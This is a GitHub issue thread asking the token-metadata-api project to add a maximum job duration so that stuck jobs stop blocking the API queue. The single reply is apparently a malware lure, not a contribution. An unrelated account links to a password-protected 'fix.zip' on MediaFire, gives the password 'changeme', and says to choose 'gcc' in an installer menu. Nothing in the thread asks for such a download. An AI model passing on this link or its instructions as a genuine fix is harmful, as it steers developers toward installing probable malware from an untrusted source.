### ISSUE TITLE
set a maximum time a job can take before marking it as failed

### ISSUE THREAD

**Issue by rafaelcr** [hirosystems/token-metadata-api#243]
Sometimes some jobs may take a very long time when ran, causing the entire API queue to be stuck. We should set a maximum job time that helps in these edge cases and marks these jobs as failed.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
